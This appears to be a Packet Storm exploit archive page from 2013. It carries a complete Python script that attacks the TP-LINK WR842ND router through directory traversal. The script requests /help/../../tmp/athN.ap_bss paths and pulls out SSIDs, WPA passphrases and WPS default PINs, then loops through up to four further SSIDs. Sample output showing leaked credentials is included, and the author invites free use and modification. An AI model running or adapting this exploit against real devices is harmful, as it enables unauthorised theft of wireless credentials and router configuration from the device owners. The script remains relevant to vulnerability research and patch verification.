ignore security and it'll go away

TP-LINK WR842ND Directory Traversal

TP-LINK WR842ND Directory Traversal
Posted May 29, 2013
Authored by Adam Simuntis

TP-LINK WR842ND suffers from a remote directory traversal vulnerability.

tags | exploit, remote, file inclusion
MD5 | fc57682595f0e68afdcfb0f7926bf6dc

TP-LINK WR842ND Directory Traversal

Change Mirror Download
#!/usr/bin/python

'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.


Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n

Feel free to use, modify and distribute.

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

:: Crafting and sending evil request..

-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"


:: Search for another networks? (y/n)
> y

:: Searching..

:: Jumping for SSID 1..

-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"

:: Jumping for SSID 2..


:: Jumping for SSID 3..


:: Jumping for SSID 4..

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->

'''

import requests,sys,socket
from time import sleep

data=''
data2=''
url=''

W = '\033[0m'
R = '\033[31m'
B = '\033[34m'

#KISS
def parse_data(text):
words = text.split()

for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W

def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk

if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()

url = make_url(sys.argv[1],0)

if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]

headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}

print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"

try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content

except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()

if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W

print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")

if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W

for i in range(1,5) :

print W+":: Jumping for SSID %s..\n" %(i)

sleep(3)

url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content

if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"

else :
print W+"\n:: Bye!"

print

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close